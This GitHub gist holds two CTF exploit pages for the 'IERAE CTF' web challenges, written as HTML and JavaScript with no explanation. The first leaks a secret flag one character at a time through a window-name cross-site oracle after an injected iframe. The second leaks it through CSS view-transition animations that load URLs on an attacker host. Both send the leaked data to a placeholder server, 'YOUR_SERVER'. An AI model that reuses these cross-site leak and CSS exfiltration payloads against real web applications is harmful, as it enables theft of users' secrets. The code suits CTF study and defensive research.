Skip to content

Instantly share code, notes, and snippets.

@satoooon8888
Created September 22, 2024 06:12
Show Gist options
  • Save satoooon8888/2d166541f044e633dd04f2202f55cefe to your computer and use it in GitHub Desktop.
Save satoooon8888/2d166541f044e633dd04f2202f55cefe to your computer and use it in GitHub Desktop.
IERAE CTF web challenges
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Exploit</title>
</head>
<body>
<script type="text/javascript">
const EXP_HOST = 'http://YOUR_SERVER';
const WEB_HOST = 'http://web:3000';
const CHARS = `abcdefghijklmnopqrstuvwxyz}`;
const sleep = async (msec) => new Promise((resolve) => setTimeout(resolve, msec));
const log = async (path) => {
debugger;
await fetch(`${EXP_HOST}${path}`);
}
const submitForm = (method, action, params, target="_blank") => {
const form = document.createElement("form");
form.method = method;
form.action = action;
form.target = target;
Object.entries(params).forEach(([k, v]) => {
const input = document.createElement("input");
input.type = "text";
input.name = k;
input.value = v;
form.appendChild(input);
});
document.body.appendChild(form);
form.submit();
}
const HIT_NAME=`</li>\n<li><span class=`;
const oracle = async (s) => {
w = open(`${WEB_HOST}/?query=${s}`);
await sleep(300);
try{
if (typeof w[HIT_NAME]) {
w.close();
return true;
}
} catch (e) {
console.log(e)
}
w.close();
return false;
}
const leak = async (prefix) => {
for (let c of CHARS) {
const payload = prefix + c;
const result = await oracle(payload);
if (result) return payload;
}
throw Error("nope");
}
const exploit = async () => {
submitForm("POST", `${WEB_HOST}/create`, {
note: '<iframe name="'
})
await sleep(1000);
let prefix = "IERAE{"
while (1) {
prefix = await leak(prefix)
log(`/log?${prefix}`);
}
};
(async () => {
try {
console.log("Start exploit");
await exploit();
console.log("Finished exploit");
} catch (e) {
console.log(e);
}
})();
</script>
</body>
</html>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Exploit</title>
</head>
<body>
<script type="text/javascript">
const EXP_HOST = 'http://YOUR_SERVER';
const WEB_HOST = 'http://web:3000';
const CHARS = `abcdefghijklmnopqrstuvwxyz`;
const sleep = async (msec) => new Promise((resolve) => setTimeout(resolve, msec));
const log = async (path) => {
await fetch(`${EXP_HOST}${path}`);
}
const submitForm = (method, action, params, target="_blank") => {
const form = document.createElement("form");
form.method = method;
form.action = action;
form.target = target;
Object.entries(params).forEach(([k, v]) => {
const input = document.createElement("input");
input.type = "text";
input.name = k;
input.value = v;
form.appendChild(input);
});
document.body.appendChild(form);
form.submit();
}
const leak = async (prefix) => {
for (let c of CHARS) {
const w = open(`${WEB_HOST}/?search=${prefix+c}`, prefix+c);
await sleep(300);
w.focus();
// if the prefix is hit, the flag doesn't start with the prefix
submitForm("POST", `${WEB_HOST}/create`, {
title: `note-${prefix+c}`,
body: prefix+c,
style: `
@keyframes anim {
0% {
background-image: url(${EXP_HOST}/hit?leak=${prefix}/${c});
}
}
::view-transition-old(site-title) {
animation: 0.01s linear both anim;
}
::view-transition-new(site-title) {
animation: 0.01s linear both anim;
}
`
}, prefix+c)
await sleep(300);
w.close();
}
}
const exploit = async () => {
let prefix = "IERAE{"
while (1) {
await leak(prefix)
await sleep(300);
await fetch("/prefix").then(r=>r.text()).then(r=>{
prefix = r;
});
}
};
(async () => {
try {
console.log("Start exploit");
await exploit();
console.log("Finished exploit");
} catch (e) {
console.log(e);
}
})();
</script>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment